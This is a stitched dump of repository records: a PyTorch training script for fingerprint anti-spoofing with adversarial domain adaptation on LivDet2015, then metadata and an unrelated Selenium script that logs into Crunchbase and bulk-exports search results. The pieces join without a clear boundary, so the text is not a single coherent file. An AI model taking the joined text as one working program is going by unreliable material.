"joao-afonso-pereira/Fingerprint-Antispoofing-Domain-Adaptation-and-Adversarial-Learning", "src_encoding": "UTF-8", "text": "import argparse\nimport os\nimport numpy as np\nimport torch\nfrom torch.nn import functional as F\nimport matplotlib.pyplot as plt\nfrom sklearn import metrics\nfrom statistics import mean\nimport pickle\nimport math\nimport sys\n\nsys.path.insert(0, 'utils/')\nsys.path.insert(0, 'data/')\nsys.path.insert(0, 'models/')\nsys.path.insert(0, 'layers/')\nsys.path.insert(0, 'losses/')\n\nfrom cnn2_utils import _nanargmin, frange\nfrom data_cnn2 import get_data_loaders\nfrom cnn_reg import CNN_REG\nfrom losses_fpad import softCrossEntropyUniform, signer_transfer_loss_\n\n#%%\n\n# layers to regularize\nCONV_LAYERS = -1\n\ndef split_batch_per_signer(x, y, g_norm, h_conv, y_task, n_signers):\n\n \n \"\"\"split data per signer identity\n\n Parameters:\n x (type): batch of data\n y (type): batch of gesture labels\n g_norm (type): batch of signer iodentities labels\n h_conv (type): activations of conv layers\n h_dense (type): activations of dense layers\n y_task (type): class labels predictions\n n_signers (type): number of training signer identities\n\n Returns:\n x_split (type): x splitted by signer identity\n y_split (type): y splitted by signer identity\n g_split (type): g splitted by signer identity\n h_conv_split (type): h_conv splitted by signer identity\n h_dense_split (type): h_dense splitted by signer identity\n y_task_split (type): y_task splitted by signer identity\n\n \"\"\"\n x_split = [False]*n_signers\n y_split = [False]*n_signers\n g_split = [False]*n_signers\n y_task_split = [False]*n_signers\n h_conv_split = [False]*n_signers\n\n for s in range(n_signers):\n x_split[s] = x[g_norm == s]\n y_split[s] = y[g_norm == s]\n g_split[s] = g_norm[g_norm == s]\n\n h_conv_split[s] = [torch.mean(h[g_norm == s], dim=0)\n for h in h_conv[CONV_LAYERS:]]\n y_task_split[s] = y_task[g_norm == s]\n\n return x_split, y_split, g_split, h_conv_split, y_task_split\n\n#%% \n\nEPOCHS = 100\n\nloss_fn = F.cross_entropy\n\nLEARNING_RATE = 1e-04\nREG = 1e-04\n\nADV_WEIGHT_LIST = frange(0.1, 1, 0.1) #for optimization\nTRANSFER_WEIGHT_LIST = frange(0.1, 1, 0.1) #for optimization\n\ndef fit(model, adv_weight, transfer_weight, data, n_fake, device, model_path, output):\n # train and validation loaders\n train_loader, valid_loader = data\n print(\"Train/Val batches: {}/{}\".format(len(train_loader),\n len(valid_loader)))\n \n print(\"\\n * ADV_WEIGHT = {}\".format(adv_weight))\n print(\" * TRANSFER_WEIGHT = {}\".format(transfer_weight))\n\n # Set the optimizer\n task_opt = torch.optim.Adam(list(model.feature_extractor.parameters()) + \n list(model.task_classifier.parameters()),\n lr=LEARNING_RATE,\n weight_decay=REG)\n\n adv_opt = torch.optim.Adam(list(model.adv_classifier.parameters()),\n lr=LEARNING_RATE,\n weight_decay=REG)\n\n # Start training\n train_history = {'train_loss': [], 'train_acc': [], 'train_apcer': [], 'train_bpcer': [], 'train_eer': [], 'train_bpcer_apcer1': [], 'train_bpcer_apcer5': [], 'train_bpcer_apcer10': [], 'train_apcer1': [], 'train_apcer5': [], 'train_apcer10': [],\n 'val_loss': [], 'val_acc': [], 'val_apcer': [], 'val_bpcer': [], 'val_eer': [], 'val_bpcer_apcer1': [], 'val_bpcer_apcer5': [], 'val_bpcer_apcer10': [], 'val_apcer1': [], 'val_apcer5': [], 'val_apcer10': []}\n\n # Best validation params\n best_val = -float('inf')\n best_epoch = 0\n\n for epoch in range(EPOCHS):\n print('\\nEPOCH {}/{}\\n'.format(epoch + 1, EPOCHS))\n\n # TRAINING\n # set model to train\n model.train()\n for i, (x, y, f, f_norm) in enumerate(train_loader): \n\n x = x.to(device)\n x_fake = x[f != -1]\n \n if x.shape[0] == 0 or x_fake.shape[0] == 0:\n continue\n \n y = y.type(torch.LongTensor).to(device)\n f_norm_fake = f_norm[f != -1].type(torch.LongTensor).to(device)\n \n # forward pass\n conv_list, h_task, conv_list_fake, h_adv = model(x, x_fake)\n y_task = h_task[-1]\n y_adv = h_adv[-1]\n\n # Compute vae loss\n task_loss = loss_fn(y_task, y)\n adv_loss = loss_fn(y_adv, f_norm_fake)\n \n x_split, y_split, g_split, h_conv_split, y_task_split = split_batch_per_signer(x, y, f_norm, conv_list, y_task, n_fake-1)\n fake_on_batch = [i for i in range(len(g_split)) if len(g_split[i])]\n\n if len(fake_on_batch) <= 1:\n transfer_loss = torch.tensor(0.0)\n else:\n transfer_loss = signer_transfer_loss_(h_conv_split, fake_on_batch)\n \n loss = task_loss + adv_weight*softCrossEntropyUniform(y_adv) + transfer_weight*transfer_loss\n\n task_opt.zero_grad()\n loss.backward(retain_graph=True)\n task_opt.step()\n\n adv_opt.zero_grad()\n adv_loss.backward()\n adv_opt.step()\n\n # display the mini-batch loss\n sys.stdout.write(\"\\r\" + '........{}-th mini-batch loss: {:.3f} | task_loss: {:.3f} | CEU_loss: {:.3f} | adv_loss: {:.3f} | transfer_loss: {:.3f} '.format(i+1, loss.item(), task_loss.item(), softCrossEntropyUniform(y_adv).item(), adv_loss.item(), transfer_loss.item()))\n sys.stdout.flush()\n \n # Validation\n tr_loss, tr_acc, tr_apcer, tr_bpcer, tr_eer, tr_bpcer_apcer1, tr_bpcer_apcer5, tr_bpcer_apcer10, tr_apcer1, tr_apcer5, tr_apcer10 = eval_model(model, train_loader, n_fake, adv_weight, transfer_weight, device)\n train_history['train_loss'].append(tr_loss.item())\n train_history['train_acc'].append(tr_acc)\n train_history['train_apcer'].append(tr_apcer)\n train_history['train_bpcer'].append(tr_bpcer)\n train_history['train_eer'].append(tr_eer)\n train_history['train_bpcer_apcer1'].append(tr_bpcer_apcer1)\n train_history['train_bpcer_apcer5'].append(tr_bpcer_apcer5)\n train_history['train_bpcer_apcer10'].append(tr_bpcer_apcer10)\n train_history['train_apcer1'].append(tr_apcer1)\n train_history['train_apcer5'].append(tr_apcer5)\n train_history['train_apcer10'].append(tr_apcer10)\n\n val_loss, val_acc, val_apcer, val_bpcer, val_eer, val_bpcer_apcer1, val_bpcer_apcer5, val_bpcer_apcer10, val_apcer1, val_apcer5, val_apcer10 = eval_model(model, valid_loader, n_fake, adv_weight, transfer_weight, device)\n train_history['val_loss'].append(val_loss.item())\n train_history['val_acc'].append(val_acc)\n train_history['val_apcer'].append(val_apcer)\n train_history['val_bpcer'].append(val_bpcer)\n train_history['val_eer'].append(val_eer)\n train_history['val_bpcer_apcer1'].append(val_bpcer_apcer1)\n train_history['val_bpcer_apcer5'].append(val_bpcer_apcer5)\n train_history['val_bpcer_apcer10'].append(val_bpcer_apcer10)\n train_history['val_apcer1'].append(val_apcer1)\n train_history['val_apcer5'].append(val_apcer5)\n train_history['val_apcer10'].append(val_apcer10)\n\n\n # save best validation model\n if best_val < val_acc:\n torch.save(model.state_dict(), model_path + 'cnn2_fpad.pth')\n best_val = val_acc\n best_epoch = epoch\n\n # display the training loss\n print()\n print('\\n>> Train loss: {:.3f} |'.format(tr_loss.item()) + ' Train Acc: {:.3f}'.format(tr_acc) + '\\n Train APCER: {:.3f} |'.format(tr_apcer) + ' Train BPCER: {:.3f}'.format(tr_bpcer) + '\\n Train EER: {:.3f}'.format(tr_eer))\n\n print('\\n>> Valid loss: {:.3f} |'.format(val_loss.item()) + ' Valid Acc: {:.3f}'.format(val_acc) + '\\n Valid APCER: {:.3f} |'.format(val_apcer) + ' Valid BPCER: {:.3f}'.format(val_bpcer) + '\\n Valid EER: {:.3f}'.format(val_eer))\n\n print('\\n>> Best model: {} / Acc={:.3f}'.format(best_epoch+1, best_val))\n print()\n\n # save train/valid history\n plot_fn = output + 'cnn2_fpad_history.png'\n plot_train_history(train_history, plot_fn=plot_fn)\n\n # return best validation model\n model.load_state_dict(torch.load(model_path + 'cnn2_fpad.pth'))\n\n return model, train_history, valid_loader, best_epoch+1\n\n\ndef plot_train_history(train_history, plot_fn=None):\n plt.switch_backend('agg')\n\n best_val_epoch = np.argmin(train_history['val_loss'])\n best_val_acc = train_history['val_acc'][best_val_epoch]\n best_val_loss = train_history['val_loss'][best_val_epoch]\n plt.figure(figsize=(7, 5))\n epochs = len(train_history['train_loss'])\n x = range(epochs)\n plt.subplot(211)\n plt.plot(x, train_history['train_loss'], 'r-')\n plt.plot(x, train_history['val_loss'], 'g-')\n plt.plot(best_val_epoch, best_val_loss, 'bx')\n plt.xlabel('Epoch')\n plt.ylabel('Train/Val loss')\n plt.legend(['train_loss', 'val_loss'])\n plt.axis([0, epochs, 0, max(train_history['train_loss'])])\n plt.subplot(212)\n plt.plot(x, train_history['train_acc'], 'r-')\n plt.plot(x, train_history['val_acc'], 'g-')\n plt.plot(best_val_epoch, best_val_acc, 'bx')\n plt.xlabel('Epoch')\n plt.ylabel('Train/Val acc')\n plt.legend(['train_acc', 'val_acc'])\n plt.axis([0, epochs, 0, 1])\n if plot_fn:\n #plt.show()\n plt.savefig(plot_fn)\n plt.close()\n else:\n plt.show()\n\n\ndef eval_model(model, data_loader, n_fake, adv_weight, transfer_weight, device, debug=False):\n with torch.no_grad():\n\n model.eval()\n \n loss_eval = 0\n N = 0\n n_correct = 0\n \n TP = 0\n TN = 0\n FP = 0\n FN = 0\n \n PA = 0\n BF = 0\n \n eer_list = []\n \n BPCER_APCER1_list = []\n BPCER_APCER5_list = []\n BPCER_APCER10_list = []\n \n APCER1_list = []\n APCER5_list = []\n APCER10_list = []\n \n for i, (x, y, f, f_norm) in enumerate(data_loader):\n \n # send mini-batch to gpu\n x = x.to(device)\n x_fake = x[f != -1]\n \n if x.shape[0] == 0 or x_fake.shape[0] == 0:\n continue\n \n y = y.type(torch.LongTensor).to(device)\n f_norm_fake = f_norm[f != -1].type(torch.LongTensor).to(device)\n\n # forward pass\n conv_list, h_task, conv_list_fake, h_adv = model(x, x_fake) \n y_task = h_task[-1]\n y_adv = h_adv[-1]\n\n # Compute vae loss\n task_loss = loss_fn(y_task, y)\n adv_loss = loss_fn(y_adv, f_norm_fake)\n \n x_split, y_split, g_split, h_conv_split, y_task_split = split_batch_per_signer(x, y, f_norm, conv_list, y_task, n_fake-1)\n fake_on_batch = [i for i in range(len(g_split)) if len(g_split[i])]\n\n if len(fake_on_batch) <= 1:\n transfer_loss = torch.tensor(0.0)\n else:\n transfer_loss = signer_transfer_loss_(h_conv_split, fake_on_batch)\n \n loss = task_loss + adv_weight*softCrossEntropyUniform(y_adv) + transfer_weight*transfer_loss\n\n # Compute cnn loss\n loss_eval += loss * x.shape[0]\n\n # Compute Acc\n N += x.shape[0]\n ypred_ = torch.argmax(y_task, dim=1)\n n_correct += torch.sum(1.*(ypred_ == y)).item()\n \n y = y.cpu().numpy()\n ypred_ = ypred_.cpu().numpy()\n \n # Biometric metrics\n \n TP += np.sum(np.logical_and(ypred_, y))\n TN += np.sum(np.logical_and(1-ypred_, 1-y))\n \n FP += np.sum(np.logical_and(ypred_, 1-y))\n FN += np.sum(np.logical_and(1-ypred_, y))\n \n PA += np.sum(y == 0)\n BF += np.sum(y == 1)\n \n probs = model.predict(x, x_fake)\n \n probs = probs.cpu().numpy()\n\n probs = probs[:, 1]\n \n fpr, tpr, threshold = metrics.roc_curve(y, probs)\n fnr = 1 - tpr \n \n BPCER_APCER1_list.append(fpr[(np.abs(fnr - 0.01)).argmin()])\n BPCER_APCER5_list.append(fpr[(np.abs(fnr - 0.05)).argmin()])\n BPCER_APCER10_list.append(fpr[(np.abs(fnr - 0.1)).argmin()])\n \n APCER1_list.append(fnr[(np.abs(fnr - 0.01)).argmin()])\n APCER5_list.append(fnr[(np.abs(fnr - 0.05)).argmin()])\n APCER10_list.append(fnr[(np.abs(fnr - 0.1)).argmin()])\n \n index = _nanargmin(np.absolute((fnr - fpr)))\n if math.isnan(index) == False:\n eer_list.append(fpr[index])\n\n loss_eval = loss_eval / N\n acc = n_correct / N\n APCER = (FP * 1.) / (FP + TN)\n BPCER = (FN * 1.) / (FN + TP)\n \n BPCER_APCER1=mean(BPCER_APCER1_list)\n BPCER_APCER5=mean(BPCER_APCER5_list)\n BPCER_APCER10=mean(BPCER_APCER10_list)\n \n APCER1=mean(APCER1_list)\n APCER5=mean(APCER5_list)\n APCER10=mean(APCER10_list)\n \n if eer_list != []:\n EER = mean(eer_list)\n else:\n EER = -float('inf')\n \n return loss_eval, acc, APCER, BPCER, EER, BPCER_APCER1, BPCER_APCER5, BPCER_APCER10, APCER1, APCER5, APCER10 \n\n\ndef main():\n \n IMG_PATH = \"/ctm-hdd-pool01/DB/LivDet2015/train/\"\n #IMG_PATH = \"L:/FPAD/Dataset/LivDet2015/train/\"\n \n CUDA = 0\n \n print()\n if torch.cuda.is_available():\n DEVICE = torch.device(\"cuda:\" + str(CUDA)) # you can continue going on here, like cuda:1 cuda:2....etc. \n print(\"[Device] - GPU\")\n else:\n DEVICE = torch.device(\"cpu\")\n print(\"[Device] - CPU\")\n \n mode = input(\"Enter the mode [train/optim/test]: \") #train\n data_ = input(\"Dataset [ALL/CrossMatch/Digital_Persona/GreenBit/Hi_Scan/Time_Series]: \")\n \n if mode==\"optim\":\n unseen_ = \"y\"\n else:\n unseen_ = input(\"Unseen attack? [y/n]: \") \n \n if unseen_ == \"y\":\n unseen = True\n NUM_ITERATIONS = 1\n attack_txt = \"UA\"\n elif unseen_ == \"n\":\n unseen = False \n NUM_ITERATIONS = 3\n attack_txt = \"OA\"\n else:\n sys.exit(\"Error ('Unseen attack?'): incorrect input!\")\n \n if data_ == \"ALL\": \n sensors = [\"CrossMatch\", \"Digital_Persona\", \"GreenBit\", \"Hi_Scan\", \"Time_Series\"] \n else: \n sensors = [data_] \n\n for DATASET in sensors:\n \n print(\"\\n[Dataset] - \" + DATASET + \"\\n\")\n \n \n if DATASET == \"CrossMatch\" or DATASET==\"Time_Series\":\n NUM_MATERIALS = 3\n else:\n NUM_MATERIALS = 4\n \n # For LOOP - Test splits\n train_results_ = []\n results = []\n best_epochs = [] \n optimization = []\n \n for iteration in range(NUM_ITERATIONS):\n \n print(\"\\n-- ITERATION {}/{} --\".format(iteration+1, NUM_ITERATIONS))\n \n for test_material in range(NUM_MATERIALS):\n \n output_fn = \"results/\" + DATASET + \"/\" + DATASET + \"_\" + str(test_material) + \"_\"\n model_path = \"/ctm-hdd-pool01/afpstudents/jaf/CNN2_\" + DATASET + \"_\" + str(test_material) + \"_\"\n \n n_fake_train = -1\n if unseen_ == \"y\":\n n_fake_train = NUM_MATERIALS-1\n if unseen_ == \"n\":\n n_fake_train = 1\n \n # Train, optimize or test\n if mode == 'train':\n\n model = CNN_REG().to(DEVICE)\n \n ADV_WEIGHT = 0.47 #0.4 #0.47\n TRANSFER_WEIGHT = 0.51 #0.11 #0.51\n \n (train_loader, valid_loader, test_loader) = get_data_loaders(IMG_PATH, DATASET, test_material, croped=True, unseen_attack=unseen)\n \n \n # Fit model\n model, train_history, _, best_epoch = fit(model=model,\n adv_weight = ADV_WEIGHT,\n transfer_weight = TRANSFER_WEIGHT,\n data=(train_loader, valid_loader),\n n_fake = NUM_MATERIALS,\n device=DEVICE,\n model_path = model_path, \n output=output_fn)\n \n # save train history\n train_res_fn = output_fn + \"history.pckl\"\n pickle.dump(train_history, open(train_res_fn, \"wb\"))\n \n #Train results\n train_results = pickle.load(open(train_res_fn, \"rb\"))\n train_results_.append([train_results['train_acc'][EPOCHS-1], train_results['train_apcer'][EPOCHS-1], train_results['train_bpcer'][EPOCHS-1], train_results['train_eer'][EPOCHS-1], train_results['train_bpcer_apcer1'][EPOCHS-1], train_results['train_bpcer_apcer5'][EPOCHS-1], train_results['train_bpcer_apcer10'][EPOCHS-1], train_results['train_apcer1'][EPOCHS-1], train_results['train_apcer5'][EPOCHS-1], train_results['train_apcer10'][EPOCHS-1]])\n \n # Test results\n test_loss, test_acc, test_apcer, test_bpcer, test_eer, test_bpcer_apcer1, test_bpcer_apcer5, test_bpcer_apcer10, test_apcer1, test_apcer5, test_apcer10 = eval_model(model, test_loader, NUM_MATERIALS, ADV_WEIGHT, TRANSFER_WEIGHT, DEVICE)\n print('\\nTest loss: {:.3f} |'.format(test_loss.item()) + ' Test Acc: {:.3f}'.format(test_acc) + '\\nTest APCER: {:.3f} |'.format(test_apcer) + ' Test BPCER: {:.3f}'.format(test_bpcer)) \n print('Test BPCER@APCER=1%: {:.3f} | Test APCER1: {:.3f}'.format(test_bpcer_apcer1, test_apcer1))\n print('Test BPCER@APCER=5%: {:.3f} | Test APCER5: {:.3f}'.format(test_bpcer_apcer5, test_apcer5))\n print('Test BPCER@APCER=10%: {:.3f} | Test APCER10: {:.3f}'.format(test_bpcer_apcer10, test_apcer10))\n print('Test EER: {:.3f}'.format(test_eer))\n results.append((test_loss.item(), test_acc, test_apcer, test_bpcer, test_eer, test_bpcer_apcer1, test_bpcer_apcer5, test_bpcer_apcer10, test_apcer1, test_apcer5, test_apcer10))\n \n best_epochs.append(best_epoch)\n \n # save results\n res_fn = output_fn + 'results.pckl'\n pickle.dump(results, open(res_fn, \"wb\"))\n results = pickle.load(open(res_fn, \"rb\")) \n \n elif mode == 'optim':\n \n best_accuracy = -float('inf')\n best_adv_weight = -float('inf')\n best_epoch_ = -float('inf')\n \n step = 0\n\n #for ADV_WEIGHT in ADV_WEIGHT_LIST: \n\n ADV_WEIGHT = 0\n \n for TRANSFER_WEIGHT in TRANSFER_WEIGHT_LIST:\n\n model = CNN_REG().to(DEVICE)\n \n step = step + 1\n \n (train_loader, valid_loader, test_loader) = get_data_loaders(IMG_PATH, DATASET, test_material, croped=True, unseen_attack=unseen)\n \n \n # Fit model\n model, train_history, _, best_epoch = fit(model=model,\n adv_weight = ADV_WEIGHT, \n transfer_weight = TRANSFER_WEIGHT,\n data=(train_loader, valid_loader),\n n_fake = NUM_MATERIALS,\n device=DEVICE,\n model_path = model_path, \n output=output_fn)\n \n # save train history\n train_res_fn = output_fn + \"history_reg.pckl\"\n pickle.dump(train_history, open(train_res_fn, \"wb\"))\n \n #Train results\n train_results = pickle.load(open(train_res_fn, \"rb\"))\n history = [train_results['train_acc'][EPOCHS-1], train_results['train_apcer'][EPOCHS-1], train_results['train_bpcer'][EPOCHS-1], train_results['train_eer'][EPOCHS-1], train_results['train_bpcer_apcer1'][EPOCHS-1], train_results['train_bpcer_apcer5'][EPOCHS-1], train_results['train_bpcer_apcer10'][EPOCHS-1], train_results['train_apcer1'][EPOCHS-1], train_results['train_apcer5'][EPOCHS-1], train_results['train_apcer10'][EPOCHS-1]]\n \n test_loss, test_acc, test_apcer, test_bpcer, test_eer, test_bpcer_apcer1, test_bpcer_apcer5, test_bpcer_apcer10, test_apcer1, test_apcer5, test_apcer10 = eval_model(model, test_loader, NUM_MATERIALS-1, ADV_WEIGHT, TRANSFER_WEIGHT, DEVICE)\n \n if test_acc > best_accuracy:\n best_accuracy = test_acc\n best_adv_weight = ADV_WEIGHT\n best_transfer_weight = ADV_WEIGHT\n best_epoch_ = best_epoch\n test_results = (test_loss.item(), test_acc, test_apcer, test_bpcer, test_eer, test_bpcer_apcer1, test_bpcer_apcer5, test_bpcer_apcer10, test_apcer1, test_apcer5, test_apcer10)\n tr_results = history\n \n optimization.append((best_accuracy, best_adv_weight, best_transfer_weight))\n \n train_results_.append(tr_results)\n best_epochs.append(best_epoch_)\n results.append(test_results) \n \n elif mode == 'test':\n sys.exit(\"Error: in construction yet!\")\n else:\n sys.exit(\"Error: incorrect mode!\")\n \n \n ### PRINT RESULTS -----------------------------------------------------------------------------------------------------------------------------------\n print('\\n\\n\\n-------------------------------------------\\n-------------- R E S U L T S --------------\\n-------------------------------------------') \n \n print()\n print(\"***************\") \n print(DATASET) \n print(\"***************\")\n \n optim_res = []\n \n if optimization != []:\n \n print()\n for m in range(len(optimization)):\n print(\"\\n>> OPTIMIZATION RESULT MATERIAL {}:\\n\".format(m+1))\n print(\" - Best Accuracy = {}\".format(optimization[m][0]))\n print(\" - Best Adv Weight = {}\".format(optimization[m][1]))\n print(\" - Best Transfer Weight = {}\".format(optimization[m][2]))\n optim_res.append(optimization[m][0])\n optim_res.append(optimization[m][1])\n print() \n \n optim_res = np.array(optim_res)\n np.savetxt(DATASET + '_optim.txt', optim_res, fmt='%.3f', delimiter=',')\n \n print('\\n-------------------------------------------') \n \n # Compute average and std\n acc_array = np.array([i[1] for i in results])\n apcer_array = np.array([i[2] for i in results])\n bpcer_array = np.array([i[3] for i in results])\n eer_array = np.array([i[4] for i in results])\n bpcer_apcer1_array = np.array([i[5] for i in results])\n bpcer_apcer5_array = np.array([i[6] for i in results])\n bpcer_apcer10_array = np.array([i[7] for i in results])\n apcer1_array = np.array([i[8] for i in results])\n apcer5_array = np.array([i[9] for i in results])\n apcer10_array = np.array([i[10] for i in results])\n \n #Best epochs\n print('\\nBest epochs:', end=\" \")\n for epoch in best_epochs:\n print(epoch, end=\" \")\n \n #Results of all loops (train and test)\n #Results of all loops (train and test)\n np.set_printoptions(formatter={'float': '{: 0.3f}'.format})\n print()\n print(\"\\n[Acc, APCER, BPCER, EER, BPCER@APCER=1%, BPCER@APCER=5%, BPCER@APCER=10%, APCER1, APCER5, APCER10]\")\n print()\n print(\">> TRAIN RESULTS:\")\n print()\n for k in range(NUM_MATERIALS):\n print(*train_results_[k], sep = \", \") \n \n print()\n print(\">> TEST RESULTS:\")\n print()\n \n results_test = []\n \n for j in range(len(list(acc_array))):\n res = []\n res.append(acc_array[j])\n res.append(apcer_array[j])\n res.append(bpcer_array[j])\n res.append(eer_array[j])\n res.append(bpcer_apcer1_array[j])\n res.append(bpcer_apcer5_array[j])\n res.append(bpcer_apcer10_array[j])\n res.append(apcer1_array[j])\n res.append(apcer1_array[j])\n res.append(apcer10_array[j])\n \n print(*res, sep = \", \") \n \n results_test.append(res)\n \n if iteration == NUM_ITERATIONS-1: \n np.savetxt(DATASET + '_' + attack_txt + '_test.txt', results_test, fmt='%.3f', delimiter=',')\n\n \n print(\"\\n\\nDONE!\")\n\nif __name__ == '__main__':\n main()\n" } ]
23
alexlopespereira/companies
https://github.com/alexlopespereira/companies
943bf3348ed1a2b8da01fc07fd5b6684f8c5554a
39d0747b9e816861115f8bb36ae9da927b85ac8e
bcafc009cd9ffccd62a672f7bd86b2b921f42b2d
refs/heads/master
2023-01-21T19:52:10.360420
2020-12-01T21:14:40
2020-12-01T21:14:40
313,040,449
0
1
null
null
null
null
null
[ { "alpha_fraction": 0.5700934529304504, "alphanum_fraction": 0.586915910243988, "avg_line_length": 57.968502044677734, "blob_id": "9e677238bc750c51ff8a7ee982326a963b6598c6", "content_id": "b5eef4337d3d7a996b6a63cb888aa39becac786f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 7490, "license_type": "no_license", "max_line_length": 169, "num_lines": 127, "path": "/src/scrapy_crunchbase.py", "repo_name": "alexlopespereira/companies", "src_encoding": "UTF-8", "text": "import datetime\nimport os\nimport time\nfrom selenium import webdriver\nfrom selenium.webdriver.common.by import By\nimport pandas as pd\nimport shutil\n\nfrom util import wait_element\nfrom auth_data import email, password\n\nclass crawler():\n\n def __init__(self, download_dir, dest_dir):\n self.download_dir = download_dir\n self.dest_dir = dest_dir\n fp = webdriver.FirefoxProfile()\n fp.set_preference(\"browser.download.folderList\", 2)\n fp.set_preference(\"browser.download.manager.showWhenStarting\", False)\n fp.set_preference(\"browser.download.dir\", self.download_dir)\n fp.set_preference(\"browser.helperApps.neverAsk.saveToDisk\",\n \"\"\"text/plain, application/octet-stream, application/binary,\n text/csv, application/csv, application/excel, \n text/comma-separated-values, text/xml, application/xml\"\"\")\n fp.set_preference(\"pdfjs.disabled\", True)\n self.driver = webdriver.Firefox(firefox_profile=fp)\n\n\n def search_funding(self, threshold, start_announced, end_announced, start_founded, end_founded):\n # self.driver.get(url)\n dates_announced = pd.date_range(start=start_announced, end=end_announced, freq=\"6M\")\n status = wait_element(self.driver, \"//search-date//input[@type='search']\", by=By.XPATH, to_sleep=5)\n ins_search = self.driver.find_elements_by_xpath(\"//search-date//input[@type='search']\")\n for sa, ea in zip(dates_announced[0:-1], dates_announced[1:]):\n # status = wait_element(self.driver, \"//input[@type='search']\", by=By.XPATH)\n in_start_announced = ins_search[0]\n in_start_announced.clear()\n in_start_announced.send_keys(sa.strftime(\"%Y/%m/%d\"))\n in_end_announced = ins_search[1]\n in_end_announced.clear()\n in_end_announced.send_keys(ea.strftime(\"%Y/%m/%d\"))\n dates_founded = pd.date_range(start=start_founded, end=end_founded, freq=\"6M\")\n for sf, ef in zip(dates_founded[0:-1], dates_founded[1:]):\n in_start_founded = ins_search[2]\n in_start_founded.clear()\n in_start_founded.send_keys(sf.strftime(\"%Y/%m/%d\"))\n in_end_founded = ins_search[3]\n in_end_founded.clear()\n in_end_founded.send_keys(ef.strftime(\"%Y/%m/%d\"))\n wait_element(self.driver, '//button[@aria-label=\"Search\"]', by=By.XPATH, to_sleep=2)\n button_searc = self.driver.find_element_by_xpath('//button[@aria-label=\"Search\"]')\n button_searc.click()\n wait_element(self.driver, '//div[@class=\"cb-overflow-ellipsis\"]', by=By.XPATH, to_sleep=1)\n nresults = int(self.driver.find_element_by_xpath(\"//results-info[@class='flex-none hide show-gt-xs']/h3\").text.split(\" \")[-2].replace(\",\", \"\"))\n if nresults > threshold:\n print(f\"{sa.strftime('%Y/%m/%d')}, {ea.strftime('%Y/%m/%d')}, {sf.strftime('%Y/%m/%d')}, {ef.strftime('%Y/%m/%d')}. {nresults} > {threshold}\")\n elif nresults > 0:\n wait_element(self.driver, '//div[@class=\"cb-overflow-ellipsis\"]', by=By.XPATH)\n button_export = self.driver.find_element_by_xpath('//export-csv-button//button')\n button_export.click()\n today_str = datetime.datetime.today().strftime(\"%m-%d-%Y\")\n filename = f\"{self.download_dir}/{self.search_name}-{today_str}.csv\"\n while not os.path.exists(filename):\n time.sleep(1)\n\n dest_file = f\"{self.dest_dir}/{self.search_name}_{sa.strftime('%Y%m%d')}_{ea.strftime('%Y%m%d')}_{sf.strftime('%Y%m%d')}_{ef.strftime('%Y%m%d')}.csv\"\n shutil.move(filename, dest_file)\n\n def search_startup(self, threshold, start_founded, end_founded):\n dates_founded = pd.date_range(start=start_founded, end=end_founded, freq=\"3M\")\n status = wait_element(self.driver, \"//search-date//input[@type='search']\", by=By.XPATH, to_sleep=10)\n ins_search = self.driver.find_elements_by_xpath(\"//search-date//input[@type='search']\")\n for sa, ea in zip(dates_founded[0:-1], dates_founded[1:]):\n in_start_announced = ins_search[0]\n in_start_announced.clear()\n in_start_announced.send_keys(sa.strftime(\"%Y/%m/%d\"))\n in_end_announced = ins_search[1]\n in_end_announced.clear()\n in_end_announced.send_keys(ea.strftime(\"%Y/%m/%d\"))\n wait_element(self.driver, '//button[@aria-label=\"Search\"]', by=By.XPATH, to_sleep=2)\n button_search = self.driver.find_element_by_xpath('//button[@aria-label=\"Search\"]')\n button_search.click()\n wait_element(self.driver, '//div[@class=\"cb-overflow-ellipsis\"]', by=By.XPATH, to_sleep=2)\n nresults = int(self.driver.find_element_by_xpath(\n \"//results-info[@class='flex-none hide show-gt-xs']/h3\")\\\n .text.split(\" \")[-2].replace(\",\", \"\"))\n if nresults > threshold:\n print(f\"{sa.strftime('%Y/%m/%d')}, {ea.strftime('%Y/%m/%d')}. {nresults} > {threshold}\")\n elif nresults > 0:\n wait_element(self.driver, '//div[@class=\"cb-overflow-ellipsis\"]', by=By.XPATH)\n button_export = self.driver.find_element_by_xpath('//export-csv-button//button')\n button_export.click()\n today_str = datetime.datetime.today().strftime(\"%m-%d-%Y\")\n filename = f\"{self.download_dir}/{self.search_name}-{today_str}.csv\"\n while not os.path.exists(filename):\n time.sleep(1)\n dest_file = f\"\"\"{self.dest_dir}/{self.search_name}_\n {sa.strftime('%Y%m%d')}_{ea.strftime('%Y%m%d')}.csv\"\"\"\n shutil.move(filename, dest_file)\n\n def crawl(self, url, type=\"funding\"):\n self.driver.get(url)\n self.search_name = type\n self.dest_dir = os.path.join(self.dest_dir, type)\n status = wait_element(self.driver, \"//input[@id='mat-input-1']\", by=By.XPATH)\n in_login = self.driver.find_element_by_xpath(\"//input[@id='mat-input-1']\")\n in_login.send_keys(email)\n in_pass = self.driver.find_element_by_xpath(\"//input[@id='mat-input-2']\")\n in_pass.send_keys(password)\n wait_element(self.driver, '//button[contains(@class,\"login\")]', by=By.XPATH)\n button_login = self.driver.find_element_by_xpath('//button[contains(@class,\"login\")]')\n button_login.click()\n if type == \"funding\":\n self.search_funding(1000, \"2015/01/01\", \"2020/01/01\", \"2015/01/01\", \"2018/01/01\")\n elif type == \"startups\":\n self.search_startup(1000, \"2016/01/01\", \"2019/09/01\")\n\n\nif __name__ == '__main__':\n url_funding = 'https://www.crunchbase.com/lists/fundingrounds/be3ae454-0bc6-443a-8f57-e29f3c3c7f09/funding_rounds'\n url_startup = \"https://www.crunchbase.com/lists/startups/8d54f127-8d3e-4a1b-ade7-bfbaaa5bfc97/organization.companies\"\n search_name = \"funding-rounds\"\n dest_dir = \"/home/alex/vscode/data/original/crunchbase/\"\n download_dir = \"/home/alex/vscode/data/original/crunchbase/tmp\"\n obj = crawler(download_dir=download_dir, dest_dir=dest_dir)\n # obj.crawl(url_funding, type=\"funding\")\n obj.crawl(url_startup, type=\"startups\")\n\n" } ]
1
SengerM/myplotlib
https://github.com/SengerM/myplotlib
6620aafecf1b55b8b33198ebce327192f59c6a47
8282226e140647342da69530aadb79b61c7c3394
057233d6eef304a3b600ade75a203846352bde6b
refs/heads/master
2023-07-02T08:09:14.754767
2021-08-10T10:08:26
2021-08-10T10:08:26
288,493,073
1
0
null
null
null
null
null
